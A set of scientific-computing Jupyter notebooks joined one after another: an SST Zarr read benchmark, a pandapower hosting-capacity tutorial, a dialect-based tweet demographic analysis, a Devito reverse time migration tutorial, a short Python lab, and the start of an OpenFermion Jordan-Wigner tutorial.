print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 3:
# Single Grid Cell; 6443 time slices
#
# **Note that the temporal extent of the Zarr store is 2002-06-01 to 2020-01-20. This results in only 6443 time steps even though our testing contraints are set at 7014 for the entire temporal range of the native collection.**
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2002-05-31','2021-08-12'),
lat = 40,
lon = -130
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 4:
# 3x3 grid cells; 100 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2003-04-10'),
lat = slice(39.975,40),
lon = slice(-130,-129.974)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 5:
# 3x3 grid cells; 1000 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2005-09-26'),
lat = slice(39.975,40),
lon = slice(-130,-129.974)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 6:
# 3x3 grid cells; 6443 time slices
#
# **Note that the temporal extent of the Zarr store is 2002-06-01 to 2020-01-20. This results in only 6443 time steps even though our testing contraints are set at 7014 for the entire temporal range of the native collection.**
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2002-05-31','2021-08-12'),
lat = slice(39.975,40),
lon = slice(-130,-129.974)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 7:
# 10x10 grid cells; 100 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2003-04-10'),
lat = slice(39.905,40),
lon = slice(-130,-129.91)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 8:
# 10x10 grid cells; 1000 time slices
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2003-01-01','2005-09-26'),
lat = slice(39.905,40),
lon = slice(-130,-129.91)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# ### Test 9:
# 10x10 grid cells; 6443 time slices
#
# **Note that the temporal extent of the Zarr store is 2002-06-01 to 2020-01-20. This results in only 6443 time steps even though our testing contraints are set at 7014 for the entire temporal range of the native collection.**
# +
times = []
for i in range(10):
t0 = time.time()
file_location = 's3://mur-sst/zarr'
ikey = fsspec.get_mapper(file_location, anon=True)
ds_sst = xr.open_zarr(ikey,consolidated=True)
sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2002-05-31','2021-08-12'),
lat = slice(39.905,40),
lon = slice(-130,-129.91)
).load()
wall_time = time.time() - t0
times.append(wall_time)
print (wall_time, "seconds wall time")
ds_sst
print("mean wall time:", mean(times), "stdev wall time:", stdev(times))
# -
sst_timeseries
sst_timeseries.plot()
# # The rest of this notebook is a copy from the Pangeo notebook referenced above.
# ### Read entire 10 years of data at 1 point.
#
# Select the ``analysed_sst`` variable over a specific time period, `lat`, and `lon` and load the data into memory. This is small enough to load into memory which will make calculating climatologies easier in the next step.
# +
# # %%time
# sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2010-01-01','2020-01-01'),
# lat = 47,
# lon = -145
# ).load()
# sst_timeseries.plot()
# -
# ### The anomaly is more interesting...
#
# Use [.groupby](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.groupby.html#xarray-dataarray-groupby) method to calculate the climatology and [.resample](http://xarray.pydata.org/en/stable/generated/xarray.Dataset.resample.html#xarray-dataset-resample) method to then average it into 1-month bins.
# - [DataArray.mean](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.mean.html#xarray-dataarray-mean) arguments are important! Xarray uses metadata to plot, so keep_attrs is a nice feature. Also, for SST there are regions with changing sea ice. Setting skipna = False removes these regions.
# +
# # %%time
# sst_climatology = sst_timeseries.groupby('time.dayofyear').mean('time',keep_attrs=True,skipna=False)
# sst_anomaly = sst_timeseries.groupby('time.dayofyear')-sst_climatology
# sst_anomaly_monthly = sst_anomaly.resample(time='1MS').mean(keep_attrs=True,skipna=False)
# #plot the data
# sst_anomaly.plot()
# sst_anomaly_monthly.plot()
# plt.axhline(linewidth=2,color='k')
# -
# # Chukchi Sea SST timeseries
#
# # Note SST is set to -1.8 C (271.35 K) when ice is present
# +
# sst_timeseries = ds_sst['analysed_sst'].sel(time = slice('2010-01-01','2020-01-01'),
# lat = 72,
# lon = -171
# ).load()
# sst_timeseries.plot()
# -
# # Grid resolution does NOT equal spatial resolution
#
# - many L4 SST analyses blend infrared (~ 1 - 4 km data) with passive microwave (~ 50 km) data. Data availability will determine regional / temporal changes in spatial resolution
#
# - many L4 SST analyses apply smoothing filters that may further reduce resolution
# +
# # %%time
# subset = ds_sst['analysed_sst'].sel(time='2019-06-01',lat=slice(35,40),lon=slice(-126,-120))
# subset.plot(vmin=282,vmax=289,cmap='inferno')
# +
# # %%time
# subset = ds_sst['analysed_sst'].sel(time='2019-05-15',lat=slice(35,40),lon=slice(-126,-120))
# subset.plot(vmin=282,vmax=289,cmap='inferno')
# -
|
AWS-notebooks/zarr-time-series-analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Hosting Capacity
#
# The term PV hosting capacity is defined as the maximum PV capacity which can be connected to a specific grid, while still complying with relevant grid codes and grid planning principles.
#
# Here we will introduce a basic algorithm to calculate PV hosting capacity with pandapower.
#
# The basic idea of calculating hosting capacity is to increase PV installation until a violation of any planning principle or constraint occurs. To analyse hosting capacity, we need three basic building blocks:
# 1. Evaluating constraint violations
# 2. Chosing connection points for new PV plants
# 3. Defining the installed power of new PV plants
# ### Evaluation of constraint violations
#
# Our example function that evaluates constraint violation is defined as:
# +
import pandapower as pp
def violations(net):
pp.runpp(net)
if net.res_line.loading_percent.max() > 50:
return (True, "Line \n Overloading")
elif net.res_trafo.loading_percent.max() > 50:
return (True, "Transformer \n Overloading")
elif net.res_bus.vm_pu.max() > 1.04:
return (True, "Voltage \n Violation")
else:
return (False, None)
# -
# The function runs a power flow and then checks for line loading and transformer loading (both of which have to be below 50%) and for voltage rise (which has to be below 1.04 pu). The function returns a boolean flag to signal if any constraint is violated as well as a string that indicates the type of constraint violation.
# ### Chosing a connection bus
#
# If new PV plants are installed, a connection bus has to be chosen. Here, we chose one random bus of each of the buses that have a load connection:
# +
from numpy.random import choice
def chose_bus(net):
return choice(net.load.bus.values)
# -
# ### Chosing a PV plant size
#
# The function that returns a plant size is given as:
# +
from numpy.random import normal
def get_plant_size_mw():
return normal(loc=0.5, scale=0.05)
# -
# This function returns a random value from a normal distribution with a mean of 0.5 MW and a standard deviation of 0.05 MW. Depending on the existing information, it would also be possible to use other probability distributions, such as a Weibull distribution, or to draw values from existing plant sizes.
# ### Evaluating Hosting Capacity
#
# We now use these building blocks to evaluate hosting capacity in a generic network. We use the MV Oberrhein network from the pandapower networks package as an example:
import pandapower.networks as nw
def load_network():
return nw.mv_oberrhein(scenario="generation")
# The hosting capacity is then evaluated like this:
# +
import pandas as pd
iterations = 50
results = pd.DataFrame(columns=["installed", "violation"])
for i in range(iterations):
net = load_network()
installed_mw = 0
while 1:
violated, violation_type = violations(net)
if violated:
results.loc[i] = [installed_mw, violation_type]
break
else:
plant_size = get_plant_size_mw()
pp.create_sgen(net, chose_bus(net), p_mw=plant_size, q_mvar=0)
installed_mw += plant_size
# -
# This algorithm adds new PV plants until a violation of any constraint occurs. Then, it saves the installed PV capacity. This is carried out for a number of iteration (here: 50) to get a distribution of hosting capacity values depending on connection points and plant sizes.
#
# The results can be visualized using matplotlib and seaborn:
# +
import matplotlib.pyplot as plt
# %matplotlib inline
plt.rc('xtick', labelsize=18) # fontsize of the tick labels
plt.rc('ytick', labelsize=18) # fontsize of the tick labels
plt.rc('legend', fontsize=18) # fontsize of the tick labels
plt.rc('axes', labelsize=20) # fontsize of the tick labels
plt.rcParams['font.size'] = 20
import seaborn as sns
sns.set_style("whitegrid", {'axes.grid' : False})
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(10,5))
ax = axes[0]
sns.boxplot(results.installed, width=.1, ax=ax, orient="v")
ax.set_xticklabels([""])
ax.set_ylabel("Installed Capacity [MW]")
ax = axes[1]
ax.axis("equal")
results.violation.value_counts().plot(kind="pie", ax=ax, autopct=lambda x:"%.0f %%"%x)
ax.set_ylabel("")
ax.set_xlabel("")
sns.despine()
plt.tight_layout()
# -
# Note that this is only an example for a basic algorithm in order to demonstrate how such problems can be tackled with pandapower. Algorithms applied in real case studies might include Q-control of PV plants, transformer tap controllers, more sophisticated distribution of PV plants, probability distribution different buses, binary search for the hosting capacity evaluation etc.
|
tutorials/hosting_capacity.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Hello Capstone Project Course!
# ### This is my week-1 assignment
# #### The 'Data-Collisions.csv' is the dataset shared in the Applied Data Science Capstone - IBM
import pandas as pd
import numpy as np
df = pd.read_csv('Data-Collisions.csv')
df.head() #5 first rows in the df
print('The df dataframe has:\n'
'—', df.size, 'variables;\n'
'—', df.shape[0], 'differents rows;\n'
'And', df.shape[1], 'differents columns.')
df.info() #info in this df, with the column, non-null count and dtype (and others)
# ## The Project - Bicycles involved in the collision
# #### The project will deal with accidents involving cycling victims, in the case of this 'df' used, it is in the PEDCYLCOUNT column. Clearly, all necessary data will later be specified to establish a machine learning algorithm and provide some relationship and demonstrate (perhaps) the conditions under which the cyclist must remain more alert, or even refrain from using the bicycle, or due the high level of insecurity caused or by other factors, such as climate and others.
|
Peer-graded_Assignment_Setting_up_Github_Account_for_The_Project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#
# # Race classification
#
# <NAME> and <NAME> initially wrote this notebook. <NAME> reviwed the notebook, edited the markdown, and commented on the code.
#
# Racial demographic dialect predictions were made by the model developed by [<NAME>., <NAME>., & <NAME>. (2016)](https://arxiv.org/pdf/1608.08868.pdf). We modified their predict function in [the public Git repository](https://github.com/slanglab/twitteraae) to work in the notebook environment.
# +
# Import libraries
import pandas as pd
import numpy as np
import re
import seaborn as sns
import matplotlib.pyplot as plt
## Language-demography model
import predict
# -
# ### Import Tweets
# +
# Import file
tweets = pd.read_csv("tweet.csv").drop(['Unnamed: 0'], axis=1)
# Index variable
tweets.index.name = 'ID'
# First five rows
tweets.head()
# -
# ### Clean Tweets
# +
# HTML tags and punctuation
url_re = r'http\S+'
at_re = r'@[\w]*'
rt_re = r'^[rt]{2}'
punct_re = r'[^\w\s]'
tweets_clean = tweets.copy()
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.lower() # Lower Case
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(url_re, '') # Remove Links/URL
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(at_re, '') # Remove @
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(rt_re, '') # Remove rt
tweets_clean['Tweet'] = tweets_clean['Tweet'].str.replace(punct_re, '') # Remove Punctation
tweets_clean['Tweet'] = tweets_clean['Tweet'].apply(unicode) # Applied unicode for compatability with model
tweets_clean.head()
# -
# ### Apply Predictions
# +
predict.load_model()
def prediction(string):
return predict.predict(string.split())
predictions = tweets_clean['Tweet'].apply(prediction)
# +
tweets_clean['Predictions'] = predictions
# Fill tweets that have no predictions with None
tweets_clean = tweets_clean.fillna("NA")
tweets_clean.head()
# +
def first_last(item):
if item is 'NA':
return 'NA'
return np.array([item[0], item[3]])
# Add "Predictions_AAE_WAE" column which is predictions for AAE dialect and WAE dialect
tweets_clean['Predictions_AAE_W'] = tweets_clean['Predictions'].apply(first_last)
tweets_clean.head()
# +
# Model 1
def detect_two(item):
if item is 'NA':
return None
if item[0] >= item[1]:
return 0
else:
return 1
# Model 2
def detect_all(item):
if item is "NA":
return None
if item[0] >= item[1] and item[0] >= item[2] and item[0] >= item[3]:
return 0
elif item[3] >= item[0] and item[3] >= item[1] and item[3] >= item[2]:
return 1
else:
return 2
# Add "Racial Demographic" column such that AAE is represented by 0 and WAE is represented by 1
tweets_clean['Racial Demographic (Two)'] = tweets_clean['Predictions_AAE_W'].apply(detect_two)
tweets_clean['Racial Demographic (All)'] = tweets_clean['Predictions'].apply(detect_all)
# -
# ### Tweets with Predictions Based on Racial Demographics (AAE, WAE)
final_tweets = tweets_clean.drop(columns=["Predictions", "Predictions_AAE_W"])
final_tweets['Tweet'] = tweets['Tweet']
final_tweets.head()
# ### Export Tweets to CSV
final_tweets.to_csv('r_d_tweets_3.csv')
# ## Analysis
sns.countplot(x=final_tweets['Racial Demographic (Two)'])
plt.title("Racial Demographic (Two)")
sns.countplot(x=final_tweets['Racial Demographic (All)'])
plt.title("Racial Demographic (All)")
aae = final_tweets[final_tweets['Racial Demographic (All)'] == 0]
aae.head()
counts = aae.groupby("Type").count()
counts = counts.reset_index().rename(columns = {'Number of Votes': 'Count'})
counts
sns.barplot(x="Type", y="Count", data = counts)
plt.title("Type Counts AAE")
wae = final_tweets[final_tweets['Racial Demographic (All)'] == 1]
wae.head()
counts_wae = wae.groupby("Type").count()
counts_wae = counts_wae.reset_index().rename(columns = {'Number of Votes': 'Count'})
counts_wae
sns.barplot(x="Type", y="Count", data = counts_wae)
plt.title("Type Counts WAE")
# +
other = final_tweets[(final_tweets['Racial Demographic (All)'] == 2)] #| (final_tweets['Racial Demographic (All)'] == 0)]
counts_other = other.groupby("Type").count()
counts_other = counts_other.reset_index().rename(columns = {'Number of Votes': 'Count'})
sns.barplot(x="Type", y="Count", data = counts_other)
plt.title("Type Counts Other")
|
code/.ipynb_checkpoints/Racial Demographic Predictions on Tweets, Santiago and Ortiz-Copy1-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 02 - Reverse Time Migration
#
# This notebook is the second in a series of tutorial highlighting various aspects of seismic inversion based on Devito operators. In this second example we aim to highlight the core ideas behind seismic inversion, where we create an image of the subsurface from field recorded data. This tutorial follows on the modelling tutorial and will reuse the modelling operator and velocity model.
#
# ## Imaging requirement
#
# Seismic imaging relies on two known parameters:
#
# - **Field data** - or also called **recorded data**. This is a shot record corresponding to the true velocity model. In practice this data is acquired as described in the first tutorial. In order to simplify this tutorial we will generate synthetic field data by modelling it with the **true velocity model**.
#
# - **Background velocity model**. This is a velocity model that has been obtained by processing and inverting the field data. We will look at this methods in the following tutorial as it relies on the method we are describing here. This velocity model is usually a **smooth version** of the true velocity model.
# ## Imaging computational setup
#
# In this tutorial, we will introduce the back-propagation operator. This operator simulates the adjoint wave-equation, that is a wave-equation solved in a reversed time order. This time reversal led to the naming of the method we present here, called Reverse Time Migration. The notion of adjoint in exploration geophysics is fundamental as most of the wave-equation based imaging and inversion methods rely on adjoint based optimization methods.
#
# ## Notes on the operators
#
# As we already describe the creation of a forward modelling operator, we will use a thin wrapper function instead. This wrapper is provided by a utility class called `AcousticWaveSolver`, which provides all the necessary operators for seismic modeling, imaging and inversion. The `AcousticWaveSolver` provides a more concise API for common wave propagation operators and caches the the Devito `Operator` objects to avoid unnecessary recompilation. However, any newly introduced operators will be fully described and only used from the wrapper in the next tutorials.
#
# As before we initialize printing and import some utilities. We also raise the Devito log level to avoid excessive logging for repeated operator invocations.
# +
import numpy as np
# %matplotlib inline
from devito import configuration
configuration['log_level'] = 'WARNING'
# -
# ## Computational considerations
#
# Seismic inversion algorithms are generally very computationally demanding and require a large amount of memory to store the forward wavefield. In order to keep this tutorial as light-weight as possible we are using a very simple
# velocity model that requires low temporal and special resolution. For a more realistic model, a second set of preset parameters for a reduced version of the 2D Marmousi data set [1] is provided below in comments. This can be run to create some more realistic subsurface images. However, this second present is more computationally demanding and requires a slightly more powerful workstation.
# +
# Configure model presets
from examples.seismic import demo_model
# Enable model presets here:
preset = 'twolayer-isotropic' # A simple but cheap model (recommended)
# preset = 'marmousi2d' # A larger more realistic model
# Standard preset with a simple two-layer model
if preset == 'twolayer-isotropic':
def create_model(grid=None):
return demo_model('twolayer-isotropic', origin=(0., 0.), shape=(101, 101),
spacing=(10., 10.), nbpml=20, grid=grid)
filter_sigma = (1, 1)
nshots = 21
nreceivers = 101
t0 = 0.
tn = 1000. # Simulation last 1 second (1000 ms)
f0 = 0.010 # Source peak frequency is 10Hz (0.010 kHz)
# A more computationally demanding preset based on the 2D Marmousi model
if preset == 'marmousi2d-isotropic':
def create_model(grid=None):
return demo_model('marmousi2d-isotropic', data_path='../../../../opesci-data/',
grid=grid)
filter_sigma = (6, 6)
nshots = 301 # Need good covergae in shots, one every two grid points
nreceivers = 601 # One recevier every grid point
t0 = 0.
tn = 3500. # Simulation last 3.5 second (3500 ms)
f0 = 0.025 # Source peak frequency is 25Hz (0.025 kHz)
# -
# # True and smooth velocity models
#
# First, we create the model data for the "true" model from a given demonstration preset. This model represents the subsurface topology for the purposes of this example and we will later use it to generate our synthetic data readings. We also generate a second model and apply a smoothing filter to it, which represents our initial model for the imaging algorithm. The perturbation between these two models can be thought of as the image we are trying to recover.
# +
#NBVAL_IGNORE_OUTPUT
from examples.seismic import plot_velocity, plot_perturbation
from scipy import ndimage
# Create true model from a preset
model = create_model()
# Create initial model and smooth the boundaries
model0 = create_model(grid=model.grid)
model0.vp = ndimage.gaussian_filter(model0.vp, sigma=filter_sigma, order=0)
# Plot the true and initial model and the perturbation between them
plot_velocity(model)
plot_velocity(model0)
plot_perturbation(model0, model)
# -
# ## Acquisition geometry
#
# Next we define the positioning and the wave signal of our source and the location of our receivers. To generate the wavelet for our source we require the discretized values of time that we are going to use to model a single "shot",,
# which again depends on the grid spacing used in our model. For consistency this initial setup will look exactly as in the previous modelling tutorial, although we will vary the position of our source later on during the actual imaging algorithm.
# +
#NBVAL_IGNORE_OUTPUT
# Define acquisition geometry: source
from examples.seismic import TimeAxis, RickerSource
# Define time discretization according to grid spacing
dt = model.critical_dt # Time step from model grid spacing
time_range = TimeAxis(start=t0, stop=tn, step=dt)
src = RickerSource(name='src', grid=model.grid, f0=f0, time_range=time_range)
# First, position source centrally in all dimensions, then set depth
src.coordinates.data[0, :] = np.array(model.domain_size) * .5
src.coordinates.data[0, -1] = 20. # Depth is 20m
# We can plot the time signature to see the wavelet
src.show()
# +
# Define acquisition geometry: receivers
from examples.seismic import Receiver
# Initialize receivers for synthetic and imaging data
rec = Receiver(name='rec', grid=model.grid, npoint=nreceivers, time_range=time_range)
rec.coordinates.data[:, 0] = np.linspace(0, model.domain_size[0], num=nreceivers)
rec.coordinates.data[:, 1] = 30.
# -
# # True and smooth data
#
# We can now generate the shot record (receiver readings) corresponding to our true and initial models. The difference between these two records will be the basis of the imaging procedure.
#
# For this purpose we will use the same forward modelling operator that was introduced in the previous tutorial, provided by the `WaveSolver` utility class. This object instantiates a set of pre-defined operators according to an initial definition of the acquisition geometry, consisting of source and receiver symbols. The solver objects caches the individual operators and provides a slightly more high-level API that allows us to invoke the modelling modelling operators from the initial tutorial in a single line. In the following cells we use this to generate shot data by only specifying the respective model symbol `m` to use, and the solver will create and return a new `Receiver` object the represents the readings at the previously defined receiver coordinates.
# +
# Compute synthetic data with forward operator
from examples.seismic.acoustic import AcousticWaveSolver
solver = AcousticWaveSolver(model, src, rec, space_order=4)
true_d , _, _ = solver.forward(src=src, m=model.m)
# -
# Compute initial data with forward operator
smooth_d, _, _ = solver.forward(src=src, m=model0.m)
# +
#NBVAL_IGNORE_OUTPUT
# Plot shot record for true and smooth velocity model and the difference
from examples.seismic import plot_shotrecord
plot_shotrecord(true_d.data, model, t0, tn)
plot_shotrecord(smooth_d.data, model, t0, tn)
plot_shotrecord(smooth_d.data - true_d.data, model, t0, tn)
# -
# # Imaging with back-propagation
#
# As we explained in the introduction of this tutorial, this method is based on back-propagation.
#
# ## Adjoint wave equation
#
# If we go back to the modelling part, we can rewrite the simulation as a linear system solve:
#
# \begin{equation}
# \mathbf{A}(\mathbf{m}) \mathbf{u} = \mathbf{q}
# \end{equation}
#
# where $\mathbf{m}$ is the discretized square slowness, $\mathbf{q}$ is the discretized source and $\mathbf{A}(\mathbf{m})$ is the discretized wave-equation. The discretized wave-equation matricial representation is a lower triangular matrix that can be solve with forward substitution. The pointwise writing or the forward substitution leads to the time-stepping stencil.
#
# On a small problem one could form the matrix explicitly and transpose it to obtain the adjoint discrete wave-equation:
#
# \begin{equation}
# \mathbf{A}(\mathbf{m})^T \mathbf{v} = \delta \mathbf{d}
# \end{equation}
#
# where $\mathbf{v}$ is the discrete **adjoint wavefield** and $\delta \mathbf{d}$ is the data residual defined as the difference between the field/observed data and the synthetic data $\mathbf{d}_s = \mathbf{P}_r \mathbf{u}$. In our case we derive the discrete adjoint wave-equation from the discrete forward wave-equation to get its stencil.
#
# ## Imaging
#
# Wave-equation based imaging relies on one simple concept:
#
# - If the background velocity model is cinematically correct, the forward wavefield $\mathbf{u}$ and the adjoint wavefield $\mathbf{v}$ meet at the reflectors position at zero time offset.
#
# The sum over time of the zero time-offset correlation of these two fields then creates an image of the subsurface. Mathematically this leads to the simple imaging condition:
#
# \begin{equation}
# \text{Image} = \sum_{t=1}^{n_t} \mathbf{u}[t] \mathbf{v}[t]
# \end{equation}
#
# In the following tutorials we will describe a more advanced imaging condition that produces shaper and more accurate results.
#
# ## Operator
#
# We will now define the imaging operator that computes the adjoint wavefield $\mathbf{v}$ and correlates it with the forward wavefield $\mathbf{u}$. This operator essentially consist of three components:
# * Stencil update of the adjoint wavefield `v`
# * Injection of the data residual at the adjoint source (forward receiver) location
# * Correlation of `u` and `v` to compute the image contribution at each timestep
# +
# Define gradient operator for imaging
from devito import TimeFunction, Operator, Eq, solve
from examples.seismic import PointSource
def ImagingOperator(model, image):
# Define the wavefield with the size of the model and the time dimension
v = TimeFunction(name='v', grid=model.grid, time_order=2, space_order=4)
u = TimeFunction(name='u', grid=model.grid, time_order=2, space_order=4,
save=time_range.num)
# Define the wave equation, but with a negated damping term
eqn = model.m * v.dt2 - v.laplace - model.damp * v.dt
# Use `solve` to rearrange the equation into a stencil expression
stencil = Eq(v.backward, solve(eqn, v.backward))
# Define residual injection at the location of the forward receivers
dt = model.critical_dt
residual = PointSource(name='residual', grid=model.grid,
time_range=time_range,
coordinates=rec.coordinates.data)
res_term = residual.inject(field=v, expr=residual * dt**2 / model.m,
offset=model.nbpml)
# Correlate u and v for the current time step and add it to the image
image_update = Eq(image, image - u * v)
return Operator([stencil] + res_term + [image_update],
subs=model.spacing_map)
# -
# ## Implementation of the imaging loop
#
# As we just explained, the forward wave-equation is solved forward in time while the adjoint wave-equation is solved in a reversed time order. Therefore, the correlation of these two fields over time requires to store one of the two fields. The computational procedure for imaging follows:
#
# - Simulate the forward wave-equation with the background velocity model to get the synthetic data and save the full wavefield $\mathbf{u}$
# - Compute the data residual
# - Back-propagate the data residual and compute on the fly the image contribution at each time step.
#
# This procedure is applied to multiple source positions (shots) and summed to obtain the full image of the subsurface. We can first visualize the varying locations of the sources that we will use.
# +
#NBVAL_IGNORE_OUTPUT
# Prepare the varying source locations
source_locations = np.empty((nshots, 2), dtype=np.float32)
source_locations[:, 0] = np.linspace(0., 1000, num=nshots)
source_locations[:, 1] = 30.
plot_velocity(model, source=source_locations)
# +
# Run imaging loop over shots
from devito import Function, clear_cache
# Create image symbol and instantiate the previously defined imaging operator
image = Function(name='image', grid=model.grid)
op_imaging = ImagingOperator(model, image)
# Create a wavefield for saving to avoid memory overload
u0 = TimeFunction(name='u', grid=model0.grid, time_order=2, space_order=4,
save=time_range.num)
for i in range(nshots):
# Important: We force previous wavefields to be destroyed,
# so that we may reuse the memory.
clear_cache()
print('Imaging source %d out of %d' % (i+1, nshots))
# Update source location
src.coordinates.data[0, :] = source_locations[i, :]
# Generate synthetic data from true model
true_d, _, _ = solver.forward(src=src, m=model.m)
# Compute smooth data and full forward wavefield u0
u0.data.fill(0.)
smooth_d, _, _ = solver.forward(src=src, m=model0.m, save=True, u=u0)
# Compute gradient from the data residual
v = TimeFunction(name='v', grid=model.grid, time_order=2, space_order=4)
residual = smooth_d.data - true_d.data
op_imaging(u=u0, v=v, m=model0.m, dt=model0.critical_dt,
residual=residual)
# +
#NBVAL_IGNORE_OUTPUT
from examples.seismic import plot_image
# Plot the inverted image
plot_image(np.diff(image.data, axis=1))
# -
assert np.isclose(np.linalg.norm(image.data), 1e6, rtol=1e1)
# And we have an image of the subsurface with a strong reflector at the original location.
# ## References
#
# [1] _<NAME>. & <NAME>. (eds.) (1991): The Marmousi experience. Proc. EAGE workshop on Practical Aspects of Seismic Data Inversion (Copenhagen, 1990), Eur. Assoc. Explor. Geophysicists, Zeist._
|
examples/seismic/tutorials/02_rtm.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/VinceDeilord/CPEN21A-ECE-2-1/blob/main/Lab1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="itaUuRMMti0s"
# Laboratory 1
# + colab={"base_uri": "https://localhost:8080/"} id="aZrij4dktt2A" outputId="19117ac8-38d2-45bb-839d-122d2ae7f841"
a = "Welcome to Pyhton programming"
b = "Name: <NAME>"
c = "Address: 378 Kaybagal Central, Tagaytay, City"
d = "Age: 19 years old"
print(a)
print(b)
print(c)
print(d)
|
Lab1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
if 'google.colab' in sys.modules:
# !pip install openfermion --quiet
# # The Jordan-Wigner and Bravyi-Kitaev Transforms
#
# ## Ladder operators and the canonical anticommutation relations
#
# A system of $N$ fermionic modes is
# described by a set of fermionic *annihilation operators*
# $\{a_p\}_{p=0}^{N-1}$ satisfying the *canonical anticommutation relations*
# $$\begin{aligned}
# \{a_p, a_q\} &= 0, \label{eq:car1} \\
# \{a_p, a^\dagger_q\} &= \delta_{pq}, \label{eq:car2}
# \end{aligned}$$ where $\{A, B\} := AB + BA$. The adjoint
# $a^\dagger_p$ of an annihilation operator $a_p$ is called a *creation
# operator*, and we refer to creation and annihilation operators as
# fermionic *ladder operators*.
# In a finite-dimensional vector space the anticommutation relations have the following consequences:
#
# - The operators $\{a^\dagger_p a_p\}_{p=0}^{N-1}$ commute with each
# other and have eigenvalues 0 and 1. These are called the *occupation
# number operators*.
#
# - There is a normalized vector $\lvert{\text{vac}}\rangle$, called the *vacuum
# state*, which is a mutual 0-eigenvector of all
# the $a^\dagger_p a_p$.
#
# - If $\lvert{\psi}\rangle$ is a 0-eigenvector of $a_p^\dagger a_p$, then
# $a_p^\dagger\lvert{\psi}\rangle$ is a 1-eigenvector of $a_p^\dagger a_p$.
# This explains why we say that $a_p^\dagger$ creates a fermion in
# mode $p$.
#
# - If $\lvert{\psi}\rangle$ is a 1-eigenvector of $a_p^\dagger a_p$, then
# $a_p\lvert{\psi}\rangle$ is a 0-eigenvector of $a_p^\dagger a_p$. This
# explains why we say that $a_p$ annihilates a fermion in mode $p$.
#
# - $a_p^2 = 0$ for all $p$. One cannot create or annihilate a fermion
# in the same mode twice.
#
# - The set of $2^N$ vectors
